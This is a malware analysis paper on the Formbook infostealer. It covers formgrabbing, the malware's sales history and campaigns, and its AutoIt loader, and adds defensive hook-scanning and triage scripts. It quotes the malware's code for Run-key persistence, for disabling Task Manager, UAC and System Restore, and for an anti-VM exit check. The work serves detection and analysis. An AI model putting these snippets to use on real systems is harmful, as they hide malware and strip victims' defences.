VB2018 paper: Inside Formbook infostealer

Gabriela Nicolao

Deloitte, Argentina

Copyright © 2018 Virus Bulletin


 

Abstract

Formbook [1] is an infostealer that has been advertised for sale in public hacking forums since February 2016 by a user with the handle 'ng-Coder'. It is more advanced than a keylogger as it can retrieve authorization and login credentials from a web data form before the information reaches a secure server, bypassing HTTPS encryption. Formbook is effective even if the victims use a virtual keyboard, auto-fill, or if they copy and paste information to fill the form. The author of Formbook affirms that it is 'browser-logger software', a.k.a. form-grabbing software. Formbook offers a PHP panel, where the buyers can track their victims' information, including screenshots, keylogged data, and stolen credentials. Hosting and domain services are provided for low prices with a bin only available in the Pro version.

Formbook was used in a spam campaign in late 2017, targeting the aerospace, defence contractor and manufacturing sectors in South Korea and the USA. It includes hiding, persistence, anti-analysis, deletion and termination mechanisms along with several commands that the C&C (command-and-control) server can receive. The 'ng-Coder' user indicated that Formbook should not be used for malicious purposes and blocked sales until further notice after the spam campaigns became known. According to 'ng-Coder', Formbook should only be used to spy on family members or employees if the user has the explicit right to do so. However, this claim is dubious given the barely legitimate nature of the use of such software.

 

About formgrabbers

Formgrabbers intercept HTTP(S) data by inline hooking: the first bytes of the browser's HTTP send function are overwritten with a jump to code inside the formgrabber, which copies the request and then transfers execution back to the original function so that the request completes normally. Because the hook sits above the TLS layer, it captures the user's information in plaintext, before it is encrypted and submitted over the Internet to a secure server. Keyloggers capture only what the user types; formgrabbers also collect pasted text, auto-filled values and options selected from drop-down menus, which makes them more effective than keyloggers.

A typical formgrabber injects a DLL (Dynamic Link Library) into the browser and hooks the API through which requests leave it. For Internet Explorer this is HttpSendRequest in WININET.DLL, which receives the request headers and POST body before WinINet encrypts them; the hook copies the data to its own code and then lets the original function send the request onwards. Browsers that do not use WinINet (Firefox, Chrome) have to be hooked in their own networking code instead. Andromeda (aka Gamarue), Tinba and Weyland‑Yutani BOT are some malware families that use this technique.
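The hook described above is a 5-byte JMP written over the start of the target function, and that patch is also what a scanner looks for when checking a browser for a formgrabber. The following is an added example written for this article, not code from the paper or from Formbook: it builds the patch a hook engine writes, resolves the jump target back from the first bytes of a function, and flags prologues whose jump leaves the module. All addresses, prologue bytes and the "wininet.dll" layout are constructed for the example.

```python
"""
Inline-hook check for a browser HTTP function (added example, constructed
data). Shows the 5-byte JMP patch a user-mode hook engine writes over the
first bytes of a target such as wininet!HttpSendRequestA, and how a scanner
reads those bytes back, resolves the jump and decides whether control leaves
the module. Addresses below are NOT the real layout of wininet.dll.
"""
import struct
from typing import Dict, Optional, Tuple

JMP_REL32 = 0xE9               # jmp rel32  (5 bytes)
PUSH_IMM32, RET = 0x68, 0xC3   # push imm32 ; ret  (6 bytes, the other common hook)


def make_jmp_rel32(from_addr: int, to_addr: int) -> bytes:
    """The patch a hook engine writes at `from_addr` to divert execution to
    `to_addr`. rel32 is measured from the end of the 5-byte instruction; the
    displaced original bytes are what a trampoline replays before jumping back."""
    rel = to_addr - (from_addr + 5)
    return bytes([JMP_REL32]) + struct.pack("<i", rel)


def decode_jump_target(addr: int, prologue: bytes) -> Optional[int]:
    """Absolute target if the bytes at `addr` begin with a control transfer of
    the kind hook engines plant; None for an ordinary prologue."""
    if len(prologue) >= 5 and prologue[0] == JMP_REL32:
        rel = struct.unpack_from("<i", prologue, 1)[0]
        return addr + 5 + rel
    if len(prologue) >= 6 and prologue[0] == PUSH_IMM32 and prologue[5] == RET:
        return struct.unpack_from("<I", prologue, 1)[0]
    return None


def is_inline_hooked(addr: int, prologue: bytes,
                     module_start: int, module_end: int) -> Tuple[bool, Optional[int]]:
    """A jump that stays inside the module is normally a legitimate thunk or
    hot-patch stub; a formgrabber hook lands in the injected DLL or, with
    Formbook-style PE injection, in a private memory region outside any module."""
    target = decode_jump_target(addr, prologue)
    if target is None:
        return False, None
    return not (module_start <= target < module_end), target


# Constructed snapshot of three wininet exports: name -> (address, first bytes).
# CLEAN is the hot-patchable x86 prologue "mov edi,edi; push ebp; mov ebp,esp".
WININET_START, WININET_END = 0x76A00000, 0x76B00000
CLEAN = bytes.fromhex("8BFF558BEC")
INJECTED_CODE = 0x00431000   # constructed: where the grabber's hook body lives

SNAPSHOT: Dict[str, Tuple[int, bytes]] = {
    "HttpSendRequestA": (0x76A3F3C0, make_jmp_rel32(0x76A3F3C0, INJECTED_CODE)),
    "HttpSendRequestW": (0x76A3F520, CLEAN),
    # intra-module jump: not a hook, the scanner must not flag it
    "InternetConnectA": (0x76A2B100, make_jmp_rel32(0x76A2B100, 0x76A2B200)),
}


def scan_exports(snapshot: Dict[str, Tuple[int, bytes]],
                 module_start: int, module_end: int) -> Dict[str, int]:
    """Names of hooked exports mapped to the address their hook jumps to."""
    hooked: Dict[str, int] = {}
    for name, (addr, prologue) in snapshot.items():
        flagged, target = is_inline_hooked(addr, prologue, module_start, module_end)
        if flagged and target is not None:
            hooked[name] = target
    return hooked


if __name__ == "__main__":
    for name, target in scan_exports(SNAPSHOT, WININET_START, WININET_END).items():
        print(f"{name}: prologue jumps to {target:#010x}, outside wininet.dll")
```

On a live system the prologue bytes come from ReadProcessMemory on the browser process and the module range from its loaded-module list; a jump that leaves the module is a triage hit, not proof, because security products and compatibility shims plant the same kind of hook, so compare against a clean baseline of the same browser build.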

 

Formbook background

Prior to advertising it for sale, a user with the handle 'ng-Coder' offered Formbook for free in public hacking forums so that other users could review it.

Figure 1: First mention of Formbook in a forum.

Soon after the free version was released, the user 'ng-Coder' advertised Formbook for sale at an initial price of 250 USD. However, the author reduced the price to 120 USD in early March 2016 after receiving several complaints about the price from forum members. The current pricing list and payment methods offered in the forum are displayed in Figure 2.

Figure 2: Pricing list and payment methods for Formbook.

 

Characteristics

According to the user 'ng-Coder', Formbook boasts the following features:

  • Coded in ASM/C (x86_x64)
  • Startup (hidden)
  • Full PE-injection (no DLL/no drop/both x86 and x64)
  • Ring3 kit
  • Bin is Balloon Executable (MPIE + MEE)
  • Doesn't use suspicious Windows APIs
  • No blind hook, all hooks are thread safe including the x64, so crash is unlikely
  • All communications with the panel are encrypted
  • Install manager
  • File browsing (FB Connect)
  • Full Unicode support.

 

Control panel

Formbook operates as a botnet: each infected machine reports to a web panel through which the operator manages the information retrieved from it. Figure 3 shows the web panel.

Figure 3: Formbook web panel.

Each bot can receive the following commands from the C&C server:

  • Download and execute
  • Update
  • Uninstall
  • Visit URL
  • Clear cookies
  • Restart system
  • Shut down system
  • Force upload keystroke
  • Take screenshot
  • FB Connect (file browsing)
  • Download and execute from FB Connect
  • Update bin from FB Connect

 

Campaigns

Formbook was used in spam campaigns targeting the aerospace, defence contractor and manufacturing sectors within the US and South Korea in 2017 [2]. It was distributed via PDFs with embedded links, DOC and XLS files with malicious macros, and compressed files containing the executable.

It was also observed in 2018, distributed via emails with DOCX files that contained a URL [3]. This URL downloaded an RTF file that exploits CVE-2017-8570 and drops an executable. This executable downloads the Formbook sample.

 

Analysis

The analysed sample is a RAR self-extracting archive (SFX) that contains several files, as shown in Figure 4.

Figure 4: SFX file.

The SFX script commands, shown to the right of the file list in Figure 4, are:

  • Path=%LocalAppData%\temp\cne (directory the archive extracts into)
  • Silent=1 (extract without showing a dialog)
  • Update=UcE1U8
  • Setup=axo.exe pwm-axa (command line run after extraction)

Files with a size below 1K contain a few strings that are probably used during decompression.

When the SFX file is executed it creates %LocalAppData%\temp\cne using CreateDirectoryW and extracts the files into it. It then deletes the SFX file. Figure 5 shows the file extraction.

Figure 5: File extraction.

The axo.exe file is a renamed copy of the AutoIt interpreter; it is executed with the pwm-axa file, the AutoIt script, as its parameter. Figure 6 shows the properties of the axo.exe file.

Figure 6: Properties of the axo.exe AutoIt executable.

The script decrypts the Formbook payload and loads it into memory. To do this, it writes a file with a random name that contains Formbook's functionality, loads it, and deletes the file shortly afterwards. The file contains 44 functions with obfuscated names. The sni.mp3 file contains several strings that are used during execution, as shown in Figure 7.

Figure 7: Interesting strings found in the sni.mp3 file.

The script contains the following features:

 

1. Hiding mechanism

The script sets the hidden attribute on the cne folder, so that it is not shown by Explorer with default settings, by executing FileSetAttrib($cne_Folder_Path, "+H").

 

2. Persistence mechanism

In order to remain persistent, it adds a value named WindowsUpdate to the Run registry key that launches axo.exe with pwm-axa as its argument. When the script has administrative rights the value is written under HKLM; otherwise it is written under HKCU, once through the default registry view and once through the 64-bit view (the HKCU64 prefix). The argument is written as the 8.3 short name of the script path:

Func Persist()
    ; $cne_Folder_Path holds the extraction directory, $WindowsUpdate the value
    ; name "WindowsUpdate"; $axo_exe and $pwm_axa stand for the two file names.
    If IsAdmin() Then
        ; FileGetShortName is called twice here in the script as found; the
        ; second call returns the same string.
        RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo_exe & " " & FileGetShortName(FileGetShortName($cne_Folder_Path & "\" & $pwm_axa)))
    Else
        RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo_exe & " " & FileGetShortName($cne_Folder_Path & "\" & $pwm_axa))
        ; same value again through the 64-bit registry view
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo_exe & " " & FileGetShortName($cne_Folder_Path & "\" & $pwm_axa))
    EndIf
    Sleep(1000)
    Sleep(1000)
EndFunc

Figure 8: Persistence mechanism.

 

3. Protection disabling and anti-analysis

The script tries to modify the following registry keys:

  • RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1"): disables Task Manager for the current user
  • RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients"): deletes the key in which System Restore registers with the Software Protection Platform, turning off system protection (restore points)
  • RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0"): disables UAC (User Account Control); the change takes effect after the next reboot

The HKLM write and the deletion only succeed when the script runs with administrative rights; the Task Manager policy lives under HKCU and can be set by any user.

The script exits if it finds one of the following VMware, VirtualBox or Virtual PC processes running and, at the same time, drive D: has less than 1MB of free space:

  • VMwaretray.exe
  • Vbox.exe
  • VMwareUser.exe
  • VMwareService.exe
  • VboxService.exe
  • vpcmap.exe
  • VBoxTray.exe

The check is written as a single condition:

If DriveSpaceFree("d:\") < 1 And (ProcessExists("VMwaretray.exe") Or ProcessExists("Vbox.exe") Or ProcessExists("VMwareUser.exe") Or ProcessExists("VMwareService.exe") Or ProcessExists("VboxService.exe") Or ProcessExists("vpcmap.exe") Or ProcessExists("VBoxTray.exe")) Then Exit

AutoIt's DriveSpaceFree returns the free space in megabytes and returns 0 when the drive does not exist, so on a machine without a D: drive the first test is always true and the decision rests on the process names alone. Conversely, a sandbox that presents a D: drive with more than 1MB free passes the check regardless of which VM tools are running.
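The registry values from the persistence and protection-disabling sections, together with the anti-VM condition just shown, can be turned into a triage check. The block below is an added example written for this article, not code from the paper or from Formbook: it runs those rules over a constructed registry and process snapshot (the shape of data a forensic export or EDR telemetry provides) so that it runs offline on any platform. The key paths and value names are the ones quoted in the text; the user name, file paths and process list in the snapshot are made up.

```python
"""
Host triage for the artifacts the AutoIt loader leaves (added example,
constructed data): the WindowsUpdate Run value launching from
%LocalAppData%\temp, the DisableTaskMgr / EnableLUA / SPP\Clients changes,
and the loader's own VM-exit condition evaluated against the host.
"""
import re
from typing import Dict, List, Optional

RUN_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
)

# (key, value) -> data the script writes. Strong only together with other
# findings: administrators and group policy set these values too.
TAMPER_RULES = {
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr"): 1,
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA"): 0,
}
SPP_CLIENTS = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients"

VM_PROCESSES = {"vmwaretray.exe", "vbox.exe", "vmwareuser.exe", "vmwareservice.exe",
                "vboxservice.exe", "vpcmap.exe", "vboxtray.exe"}

# Run value shaped like "axo.exe pwm-axa": an EXE launched from
# %LocalAppData%\temp\<dir> with a single file argument. The script writes the
# argument with FileGetShortName, so an 8.3 path matches as well.
RUN_VALUE_RE = re.compile(
    r'^"?(?P<dir>[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\[^\\]+)\\'
    r'(?P<exe>[^\\\s"]+\.exe)"?\s+(?P<arg>\S+)$', re.IGNORECASE)


def check_run_keys(registry: Dict[str, Dict[str, object]]) -> List[dict]:
    findings = []
    for key in RUN_KEYS:
        for name, data in registry.get(key, {}).items():
            m = RUN_VALUE_RE.match(str(data))
            if m:
                findings.append({"key": key, "value": name,
                                 "exe": m["exe"], "arg": m["arg"]})
    return findings


def check_tampering(registry: Dict[str, Dict[str, object]]) -> List[str]:
    hits = []
    for (key, name), bad in TAMPER_RULES.items():
        if registry.get(key, {}).get(name) == bad:
            hits.append(f"{name}={bad}")
    if SPP_CLIENTS not in registry:       # deleted by the script; weak on its own
        hits.append("SPP\\Clients missing")
    return hits


def loader_would_exit(processes: List[str], d_free_mb: Optional[float]) -> bool:
    """The loader's exit condition. AutoIt's DriveSpaceFree returns 0 (and sets
    @error) when the drive does not exist, so without a D: drive the size test
    is always true and the check collapses to the process-name test."""
    free = 0.0 if d_free_mb is None else d_free_mb
    return free < 1 and any(p.lower() in VM_PROCESSES for p in processes)


def triage(registry: Dict[str, Dict[str, object]], processes: List[str],
           d_free_mb: Optional[float] = None) -> dict:
    return {"run_values": check_run_keys(registry),
            "tampering": check_tampering(registry),
            "loader_would_exit": loader_would_exit(processes, d_free_mb)}


# Constructed snapshot of an infected user profile (no D: drive, no VM tools).
SNAPSHOT_REGISTRY = {
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": {
        "WindowsUpdate": r"C:\Users\victim\AppData\Local\temp\cne\axo.exe "
                         r"C:\Users\victim\AppData\Local\temp\cne\pwm-axa",
        "OneDrive": r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System": {"DisableTaskMgr": 1},
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System": {"EnableLUA": 0},
}
SNAPSHOT_PROCESSES = ["explorer.exe", "axo.exe", "chrome.exe"]

if __name__ == "__main__":
    print(triage(SNAPSHOT_REGISTRY, SNAPSHOT_PROCESSES))
```

The loader_would_exit result is useful in the other direction as well: when a sample refuses to run in a sandbox, the function says which of the two conditions the environment tripped, and adding a D: drive with a few megabytes free is enough to get past this particular check.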

 

4. Check default browser

The script reads the default value of the HKCR\http\shell\open\command registry key, which holds the command line of the handler registered for http:// URLs, to find out which browser the victim's machine uses by default.

 

5. Formbook deletion and termination

Formbook looks for processes named svshost.exe (note the spelling, which mimics the legitimate svchost.exe) and terminates if it finds more than two of them running, as shown in Figure 9.

Figure 9: Termination.

 

Conclusion

Although the Formbook infostealer has been around for a couple of years, it only came to public attention after it was used extensively in spam campaigns in late 2017. It probably went unnoticed for so long because its developer never released the builder, which made it easy to track customers' activity and to turn the product off when it was used for unintended purposes or attracted too much attention from the security community. Even though it is not broadly used, Formbook represents a real threat: it is stealthier and more capable than a keylogger.

Similar to the Agent Tesla remote access trojan (RAT), the author of Formbook initially offered a beta version of the product free of charge in order to receive feedback and make improvements.

The 'ng-Coder' user indicates that Formbook should not be used for malicious purposes, and after the spam campaigns were made public, he blocked Formbook's sales until further notice. According to 'ng-Coder', Formbook should only be used to spy on family members or employees if the user has the explicit right to do so. However, this claim itself is dubious given the barely legitimate nature of the use of such software.

 

IOCs

The SHA256 hash of the SFX file that was analysed is: 2f74f8518bd14a882a870f3794a76dba381b59c1e40247a2483468959b572d82.

 

References

[1] Schwarz, D. The Formidable FormBook Form Grabber. Arbor Networks, 20 September 2017. https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/.

[2] Villeneuve, N.; Eitzman, R.; Nemes S.; Dean, T. Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea. FireEye, 5 October 2017. https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html.

[3] Urgent server alert malspam delivers formbook trojan via CVE-2017-8570 word doc. My Online Security, 16 February 2018. https://myonlinesecurity.co.uk/urgent-server-alert-malspam-delivers-formbook-trojan-via-cve-2017-8570-word-doc.
